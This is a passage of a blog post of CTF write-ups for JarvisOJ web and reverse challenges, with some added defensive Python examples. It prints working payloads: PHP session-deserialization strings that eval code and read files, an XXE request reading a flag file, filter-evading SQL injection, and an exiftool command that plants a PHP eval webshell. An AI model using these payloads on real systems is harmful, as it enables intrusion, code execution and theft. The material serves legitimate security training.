JarvisOJ Web&Reverse&Pwn
Source: Internet | Editor: 程序博客网 | Time: 2024/06/06 01:46
- Web
- 0x01 phpinfo
- 0x02 WEB
- 0x03 Easy Gallery
- 0x04 Login
- 0x05 PORT51
- 0x06 LOCALHOST
- 0x07 S.H.I.E.L.D.'s Secret
- 0x08 IN A Mess
- 0x09 API call
- 0x0a Simple Injection
- 0x0b Image upload vulnerability
- Reverse
- 0x01 FindKey
- 0x02 Classical Crackme
- Pwn
- 0x01 [XMAN]level0
- 0x02 [XMAN]level1
- 0x03 [XMAN]level2_x64
Web
0x01 phpinfo()
This is a PHP deserialization vulnerability challenge.
1. Principle
ini_set('session.serialize_handler', 'php_serialize');
ini_set('session.serialize_handler', 'php');
The two handlers store session data differently:
* php: the key name, a vertical bar, then the value as processed by serialize()
name|s:6:"spoock"
- php_serialize (PHP > 5.5.4): the whole session array as processed by serialize()
a:1:{s:4:"name";s:6:"spoock";}
2. Usage
* First visit test1.php
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
$_SESSION["spoock"] = $_GET["a"];
?>
This step sets the session value to |O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}
The 'php_serialize' handler then writes the session as a:1:{s:6:"spoock";s:48:"|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}";}
- Then visit test2.php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class lemon {
    var $hi;
    function __construct() {
        $this->hi = 'phpinfo();';
    }
    function __destruct() {
        eval($this->hi);
    }
}
?>
This step reads the stored session with the php handler, which splits it at the | into a key and a value. The key becomes a:1:{s:6:"spoock";s:48:" and the value becomes O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}";}. Unserializing the value automatically instantiates a lemon object, and when that object is destroyed at the end of the script its destructor runs the malicious code.
Check the result
The malicious code executed successfully.
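As an added illustration (example code written for this page, not part of the original write-up), the Python script below simulates the two storage formats described above: it writes the session with the php_serialize layout and then re-reads the same bytes with the php handler's key|value rule. The session data and the class name lemon are the ones used above; the mini-unserializer is this example's own and handles only strings, integers, arrays and objects, and, like the real handler, it gives up at the first bytes it cannot interpret.

```python
"""Added example, not part of the original write-up: simulate PHP's two
session.serialize_handler formats and show why a value written under
`php_serialize` that contains '|' is re-read by the `php` handler as a
new key/value boundary. Only s:, i:, a: and O: values are handled."""
import re


def php_serialize_string(s: str) -> str:
    # serialize() of a string: s:<byte length>:"<bytes>";
    return 's:%d:"%s";' % (len(s.encode()), s)


def encode_php_serialize_handler(session: dict) -> str:
    # `php_serialize` handler: serialize() of the whole $_SESSION array
    body = "".join(php_serialize_string(k) + php_serialize_string(v)
                   for k, v in session.items())
    return "a:%d:{%s}" % (len(session), body)


def encode_php_handler(session: dict) -> str:
    # `php` handler: key|serialized_value for every entry, nothing between entries
    return "".join(k + "|" + php_serialize_string(v) for k, v in session.items())


_STR = re.compile(r's:(\d+):"')
_INT = re.compile(r"i:(-?\d+);")
_ARR = re.compile(r"a:(\d+):\{")
_OBJ = re.compile(r'O:\d+:"([^"]*)":(\d+):\{')


def parse_value(data: str, pos: int):
    """Parse one serialized value at data[pos:]; return (value, position after it)."""
    if m := _STR.match(data, pos):
        n, start = int(m.group(1)), m.end()
        return data[start:start + n], start + n + 2        # skip the closing '";'
    if m := _INT.match(data, pos):
        return int(m.group(1)), m.end()
    if m := _ARR.match(data, pos):
        count, cls, pos = int(m.group(1)), None, m.end()
    elif m := _OBJ.match(data, pos):
        cls, count, pos = m.group(1), int(m.group(2)), m.end()
    else:
        raise ValueError("unsupported serialized value at offset %d" % pos)
    out = {"__class__": cls} if cls else {}        # an object is "instantiated" here
    for _ in range(count):
        key, pos = parse_value(data, pos)
        out[key], pos = parse_value(data, pos)
    if data[pos] != "}":
        raise ValueError("unterminated container")
    return out, pos + 1


def decode_php_handler(data: str) -> dict:
    """`php` handler read: the key is everything up to the next '|', then one value."""
    session, pos = {}, 0
    while pos < len(data):
        bar = data.find("|", pos)
        if bar < 0:           # trailing bytes with no key: the handler stops here
            break
        key = data[pos:bar]
        session[key], pos = parse_value(data, bar + 1)
    return session


# The session value from the write-up: a '|' followed by a serialized lemon object
INJECTED = '|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}'


def demo():
    stored = encode_php_serialize_handler({"spoock": INJECTED})   # what test1.php writes
    reread = decode_php_handler(stored)                           # what test2.php sees
    return stored, reread


if __name__ == "__main__":
    stored, reread = demo()
    print(stored)
    print(reread)
```

The object in the re-read result is exactly the point of the bug: the handler that reads the session creates it, and PHP will call its destructor. The configuration-level fix is to keep session.serialize_handler identical for every script that touches the same session store, rather than overriding it per file.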
http://web.jarvisoj.com:32784/
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>
- Analysis: we need to construct a session value of the form |O:5:"OowoO":1:{s:4:"mdzz";s:7:"echo 1;";}
<form action="http://web.jarvisoj.com:32784/phpinfo.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>
Submitting this form triggers PHP's session.upload_progress feature, which records the upload (including the submitted filename) into the session using the handler configured in php.ini (php_serialize here), while phpinfo.php reads the session back with the php handler. Intercept the request and change the filename value to the payload; mind the escape characters.
The final submitted value is |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:27:\"print_r(dirname(__FILE__));\";}
Use print_r(scandir("/opt/lampp/htdocs"));
payload
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}
Use file_get_contents to read the file:
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
0x02 WEB?
For this one I first tried all kinds of scanners, with no result; after a hint I looked at the source code.
First format the code with a formatter.
Then search for the string post.
Problems:
1. The check is not done on the back end
2. checkpass.json should exist
Searching for checkpass finds the checking code:
function(e) {
    if (25 !== e.length) return !1;
    for (var t = [], n = 0; n < 25; n++) t.push(e.charCodeAt(n));
    for (var r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259],
         o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135],
              [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221],
              [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230],
              [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80],
              [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45],
              [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107],
              [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249],
              [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158],
              [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98],
              [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141],
              [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119],
              [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94],
              [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208],
              [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196],
              [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40],
              [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123],
              [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236],
              [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119],
              [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196],
              [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66],
              [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214],
              [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212],
              [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235],
              [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156],
              [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]],
         n = 0; n < 25; n++) {
        for (var i = 0, a = 0; a < 25; a++) i += t[a] * o[n][a];
        if (i !== r[n]) return !1
    }
    return !0
}
The logic is simple: a system of 25 linear equations in 25 unknowns, which could also be solved online.
I solved it directly with Python's numpy module.
Here is my Python code:
import numpy as np

o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135],
     [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221],
     [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230],
     [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80],
     [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45],
     [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107],
     [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249],
     [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158],
     [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98],
     [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141],
     [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119],
     [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94],
     [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208],
     [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196],
     [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40],
     [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123],
     [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236],
     [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119],
     [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196],
     [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66],
     [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214],
     [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212],
     [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235],
     [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156],
     [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]]
r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259]

o = np.array(o, dtype=float)   # 25x25 coefficient matrix taken from the checker
r = np.array(r, dtype=float)   # the 25 expected dot products
x = np.linalg.solve(o, r)      # 25 unknowns, 25 independent equations
print(x)
# each component is a character code; round the float rather than cutting digits off its string form
string = ''.join(chr(int(round(i))) for i in x)
print(string)
0x03 Easy Gallery
I have done many upload challenges myself and have long wanted to write a summary.
This is obviously an upload challenge.
For upload challenges we generally consider a few points:
1. First, bypass the filter to get the file uploaded
2. Then get the uploaded file executed
Upload bypasses include, for example:
1. %00 truncation
2. Various other upload tricks
The most important part is executing the uploaded file; keep the following in mind:
1. PHP code inside a jpg can be executed
2. Code inside zip and other archives can be reached through a pseudo-protocol (stream wrapper)
3. Bypassing content checks:
<script language='php'>echo "123";</script>
Now for this challenge.
First try the various upload tricks; the goal is to upload a PHP file that can execute malicious code.
That did not work; changing approach, zip files cannot be uploaded either.
So the only option left is to embed PHP code in a jpg, which requires finding a file inclusion: http://web.jarvisoj.com:32785/index.php?page=view
A typical file inclusion; note that .php is appended automatically at the end,
so truncation is needed.
So the uploaded content is:
Then just access it directly.
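To make the `?page=view` pattern concrete from the defender's side, here is added example code (written for this page, not from the challenge or the write-up) that puts the vulnerable include-path construction next to a hardened resolver. The base directory, the allow-list and the page names are constructed for the example.

```python
"""Added example, not code from the write-up: the `?page=...` include
pattern from the challenge next to a hardened resolver. PAGE_DIR, the
allow-list and the page names are constructed for this example."""
import os

PAGE_DIR = "/var/www/app/pages"                # constructed base directory
ALLOWED_PAGES = {"index", "view", "upload"}    # constructed allow-list


def vulnerable_include_path(param: str) -> str:
    """Mirror the challenge: the request value is used as-is and '.php' is appended.
    An uploaded image can only be reached if the suffix is cut off, which is why
    the write-up looks for a NUL-byte truncation."""
    return PAGE_DIR + "/" + param + ".php"


def resolve_page(param):
    """Hardened resolver: return the path to include, or None to refuse the request."""
    if not isinstance(param, str) or "\x00" in param:    # NUL byte: truncation attempt
        return None
    if any(sep in param for sep in ("/", "\\", "..")):   # no traversal or sub-paths
        return None
    if param not in ALLOWED_PAGES:                        # allow-list, not a blacklist
        return None
    path = os.path.normpath(os.path.join(PAGE_DIR, param + ".php"))
    # defence in depth: the final path must still sit inside PAGE_DIR
    if os.path.commonpath([PAGE_DIR, path]) != PAGE_DIR:
        return None
    return path


if __name__ == "__main__":
    print(vulnerable_include_path("uploads/x.jpg"))   # the suffix the write-up has to cut off
    print(resolve_page("view"))
    print(resolve_page("uploads/x.jpg\x00"))
```

The allow-list is what removes the whole class of problem: the suffix trick, the null byte and traversal all stop mattering once the request value is only ever compared against known page names and never concatenated into a path.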
0x04 Login
A simple injection challenge.
Looking at the response headers reveals the hint "select * from admin where password='".md5($pass,true)."'"
An earlier post on my blog explains this in detail.
0x05 PORT51
See the screenshot.
The goal is to access the page from local port 51; using a VPS, access it from port 51: curl --local-port 51 http://web.jarvisoj.com:32770/
0x06 LOCALHOST
Set the X-Forwarded-For header to 127.0.0.1 and that is it.
0x07 S.H.I.E.L.D.'s Secret
This was very hard when I did it last year; looking at it again this year it is so simple.
Look at the logic.
The page source contains <img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>
There is a file inclusion here; base64-decoding the parameter gives shield.jpg
Try reading index.php
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
    $x = unserialize($g);
}
echo $x->readfile();
?>
Read shield.php the same way
<?php
//flag is in pctf.php
class Shield {
    public $file;
    function __construct($filename = '') {
        $this -> file = $filename;
    }
    function readfile() {
        if (!empty($this->file) && stripos($this->file,'..')===FALSE
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
            return @file_get_contents($this->file);
        }
    }
}
?>
The simplest deserialization vulnerability.
Generate the serialized value directly with a script:
<?php
//flag is in pctf.php
class Shield {
    public $file;
    function __construct($filename = '') {
        $this -> file = $filename;
    }
    function readfile() {
        if (!empty($this->file) && stripos($this->file,'..')===FALSE
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
            return @file_get_contents($this->file);
        }
    }
}
$q = new Shield();
$q->file = 'pctf.php';
echo serialize($q);
?>
Submit the output as the class parameter.
0x08 IN A Mess
Source leak: index.phps
The approach:
First, AWVS found the index.phps path.
The code is:
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'Hahahahahaha';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!")
    echo "yes";
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("flag.txt");
}
else
{
    print "work harder!harder!harder!";
}
?>
With the source in hand, it is just a matter of simple bypasses.
1. $data=="1112 is a nice lab!"
Remote file inclusion could be used when allow_url_include is enabled, but $a is filtered for '.', so the data: protocol is the safer choice (a learning link was given here).
The final bypass is a=data:,1112 is a nice lab!
2. $id==0
A typical PHP loose comparison; see my earlier blog post.
Here id=0e123 or id=asd, i.e. any string, works.
3. strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4
The strlen function is not truncated by %00 but substr is, so b=%00412311 works.
It displays: Come ON!!! {/^HT2mCpcvOLf}
Guessed to be a directory.
Opening it reveals an injection.
Spaces are filtered and sensitive keywords are removed.
Bypass with /*1*/ comments.
There are 3 columns.
Column 3 is displayed.
id=-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(seselectlect/*12*/group_concat(table_name)/*12*/frfromom/*12*/information_schema.tables/*12*/where/*12*/table_schema=database())%23
The table name is content.
id=-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(selselectect/*12*/group_concat(column_name)/*12*/frofromm/*12*/information_schema.columns/*12*/where/*12*/table_name=0x636f6e74656e74)%23
Found the context column.
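The doubled keywords in those payloads only work because the filter deletes each keyword once and lets the rest through. The added example below (written for this page, not from the write-up) models that single-pass space-and-keyword filter, shows what MySQL sees after it, and adds the check a defender would want: if a blocked keyword is still present after the filter has run, the input was built to survive it and should be rejected rather than forwarded. The keyword list is assumed from the behaviour described above; parameterised queries remain the actual fix.

```python
"""Added example, not code from the write-up: a single-pass keyword/space
filter modelled on the challenge's observed behaviour, the query MySQL
would see after it, and a reject-don't-sanitise check. BLOCKED_WORDS is
an assumption about the challenge's filter."""
import re

BLOCKED_WORDS = ["union", "select", "from"]   # assumed from the challenge's behaviour


def naive_filter(value: str) -> str:
    """Single pass: delete spaces, then every occurrence of each keyword once per keyword."""
    value = value.replace(" ", "")
    for word in BLOCKED_WORDS:
        value = re.sub(re.escape(word), "", value, flags=re.IGNORECASE)
    return value


def what_mysql_sees(filtered: str) -> str:
    """MySQL treats /* ... */ as whitespace, so the comments act as separators."""
    return re.sub(r"/\*.*?\*/", " ", filtered)


def is_rejected(value: str) -> bool:
    """Reject, don't sanitise: a blocked keyword that is still present after one
    stripping pass means the input was built to survive the filter."""
    filtered = naive_filter(value)
    return any(re.search(re.escape(w), filtered, re.IGNORECASE) for w in BLOCKED_WORDS)


# The write-up's first payload, with %23 already URL-decoded to '#'
PAYLOAD = ("-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(seselectlect/*12*/"
           "group_concat(table_name)/*12*/frfromom/*12*/information_schema.tables"
           "/*12*/where/*12*/table_schema=database())#")


if __name__ == "__main__":
    print(naive_filter(PAYLOAD))                 # keywords reassembled by the filter itself
    print(what_mysql_sees(naive_filter(PAYLOAD)))
    print(is_rejected(PAYLOAD), is_rejected("selection"))
```

Note that a harmless word such as "selection" is mangled by the filter but not rejected by the check, while the doubled-keyword payload is caught. That asymmetry is the argument against sanitising blacklists in the first place: they corrupt legitimate input and still pass crafted input.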
0x09 API call
Opening it shows
Content-Type: application/json
We need to read flag; I guessed it might be XXE and found
http://bobao.360.cn/learning/detail/360.html
If the Content-Type header is changed to application/xml, the client tells the server that the POSTed data is in XML format.
So add a Content-Type: application/xml header.
payload
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Referer: http://web.jarvisoj.com:9882/
Content-Length: 173
Cookie: __cfduid=d5003f0545042bbe0fbc573cda35051f71472823285; UM_distinctid=15abdd622a49f-02e5d4fef34197-7f682331-100200-15abdd622a5cf; role=s%3A5%3A%22guest%22%3B; hsh=3a4727d57463f122833d9e732f94e4e0
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:////home/ctf/flag.txt" >]>
<root><search>name</search><value>&xxe;</value></root>
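The endpoint above accepts whatever format the client names in Content-Type, which is the whole problem. As an added example (written for this page, not the challenge's own code), the Python below shows the gate a defender would put in front of such an API: it treats the body as XML only when the client says so, refuses any DOCTYPE (and external entities in particular) before a parser touches the data, and otherwise extracts the search and value fields. The XML body with the external entity is the one from the request above; the other bodies are constructed.

```python
"""Added example, not part of the write-up: an XML request gate for an
endpoint like /api/v1.0/try. External entities and DOCTYPEs are refused
before parsing. XXE_BODY is the body from the request in the write-up;
the other sample bodies are constructed."""
import re
import xml.etree.ElementTree as ET

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def classify_xml_body(body: str) -> str:
    """'reject-external-entity', 'reject-doctype' or 'ok'."""
    if EXTERNAL_ENTITY_RE.search(body):
        return "reject-external-entity"      # file:// or network resolution attempt
    if DOCTYPE_RE.search(body):
        return "reject-doctype"              # internal DTDs still allow entity expansion
    return "ok"


def handle_try(content_type: str, body: str):
    """Emulate the endpoint: JSON is the normal path; XML is gated before parsing."""
    ctype = content_type.split(";")[0].strip().lower()
    if ctype == "application/json":
        return "json-path"
    if ctype != "application/xml":
        return "unsupported-media-type"
    verdict = classify_xml_body(body)
    if verdict != "ok":
        return verdict
    root = ET.fromstring(body)               # only DTD-free documents reach the parser
    return {child.tag: (child.text or "") for child in root}


XXE_BODY = ('<?xml version="1.0" encoding="UTF-8" ?>'
            '<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:////home/ctf/flag.txt" >]>'
            '<root><search>name</search><value>&xxe;</value></root>')
BENIGN_BODY = '<root><search>name</search><value>guest</value></root>'      # constructed
INTERNAL_DTD_BODY = ('<!DOCTYPE root [<!ENTITY a "aaaa">]>'                 # constructed
                     '<root><search>&a;</search><value>x</value></root>')


if __name__ == "__main__":
    for ctype, body in [("application/xml", XXE_BODY),
                        ("application/xml", INTERNAL_DTD_BODY),
                        ("application/xml; charset=utf-8", BENIGN_BODY),
                        ("application/json", XXE_BODY)]:
        print(ctype, "->", handle_try(ctype, body))
```

The first line of defence is not the regex but the media-type decision: an API that only ever expected JSON should not parse XML at all. The DOCTYPE check is the second line for endpoints that genuinely need XML and cannot disable DTD processing in their parser.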
0x0a Simple Injection
A very simple SQL injection; just run sqlmap on it.
0x0b Image upload vulnerability
This is a CVE challenge; I honestly could not solve it, so I read someone else's write-up and followed along.
First, scanning found test.php, but I did not know how to use it.
At first I assumed it was the usual upload routine, but none of the methods worked.
Finally I noticed imagick in phpinfo.
A classic vulnerability.
First generate a one-line backdoor with exiftool; the path comes from phpinfo:
exiftool -label="\"|/bin/echo \<?php \@eval\(\\$\_POST\[x\]\)\;?\> > /opt/lampp/htdocs/uploads/x.php; \"" 1.png
Then upload that file.
Note that the filetype parameter must be show.
Connect with Caidao (China Chopper).
Reverse
0x01 FindKey
The file command on Ubuntu shows the file format is pyc.
Then run uncompyle6 on it directly (install it with pip if it is missing).
This gives:
# uncompyle6 version 2.9.9
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.12 (default, Nov 19 2016, 06:48:10)
# [GCC 5.4.0 20160609]
# Embedded file name: findkey
# Compiled at: 2016-04-30 17:54:18
import sys
lookup = [
    196, 153, 149, 206, 17, 221, 10, 217, 167, 18, 36, 135, 103, 61, 111, 31,
    92, 152, 21, 228, 105, 191, 173, 41, 2, 245, 23, 144, 1, 246, 89, 178,
    182, 119, 38, 85, 48, 226, 165, 241, 166, 214, 71, 90, 151, 3, 109, 169,
    150, 224, 69, 156, 158, 57, 181, 29, 200, 37, 51, 252, 227, 93, 65, 82,
    66, 80, 170, 77, 49, 177, 81, 94, 202, 107, 25, 73, 148, 98, 129, 231,
    212, 14, 84, 121, 174, 171, 64, 180, 233, 74, 140, 242, 75, 104, 253, 44,
    39, 87, 86, 27, 68, 22, 55, 76, 35, 248, 96, 5, 56, 20, 161, 213,
    238, 220, 72, 100, 247, 8, 63, 249, 145, 243, 155, 222, 122, 32, 43, 186,
    0, 102, 216, 126, 15, 42, 115, 138, 240, 147, 229, 204, 117, 223, 141, 159,
    131, 232, 124, 254, 60, 116, 46, 113, 79, 16, 128, 6, 251, 40, 205, 137,
    199, 83, 54, 188, 19, 184, 201, 110, 255, 26, 91, 211, 132, 160, 168, 154,
    185, 183, 244, 78, 33, 123, 28, 59, 12, 210, 218, 47, 163, 215, 209, 108,
    235, 237, 118, 101, 24, 234, 106, 143, 88, 9, 136, 95, 30, 193, 176, 225,
    198, 197, 194, 239, 134, 162, 192, 11, 70, 58, 187, 50, 67, 236, 230, 13,
    99, 190, 208, 207, 7, 53, 219, 203, 62, 114, 127, 125, 164, 179, 175, 112,
    172, 250, 133, 130, 52, 189, 97, 146, 34, 157, 120, 195, 45, 4, 142, 139]
pwda = [188, 155, 11, 58, 251, 208, 204, 202, 150, 120, 206, 237, 114, 92, 126, 6, 42]
pwdb = [53, 222, 230, 35, 67, 248, 226, 216, 17, 209, 32, 2, 181, 200, 171, 60, 108]
flag = raw_input('Input your Key:').strip()
if len(flag) != 17:
    print 'Wrong Key!!'
    sys.exit(1)
flag = flag[::-1]
for i in range(0, len(flag)):
    if ord(flag[i]) + pwda[i] & 255 != lookup[i + pwdb[i]]:
        print 'Wrong Key!!'
        sys.exit(1)

print 'Congratulations!!'
# okay decompiling 1.pyc
Just write the decryption program:
lookup = [
    196, 153, 149, 206, 17, 221, 10, 217, 167, 18, 36, 135, 103, 61, 111, 31,
    92, 152, 21, 228, 105, 191, 173, 41, 2, 245, 23, 144, 1, 246, 89, 178,
    182, 119, 38, 85, 48, 226, 165, 241, 166, 214, 71, 90, 151, 3, 109, 169,
    150, 224, 69, 156, 158, 57, 181, 29, 200, 37, 51, 252, 227, 93, 65, 82,
    66, 80, 170, 77, 49, 177, 81, 94, 202, 107, 25, 73, 148, 98, 129, 231,
    212, 14, 84, 121, 174, 171, 64, 180, 233, 74, 140, 242, 75, 104, 253, 44,
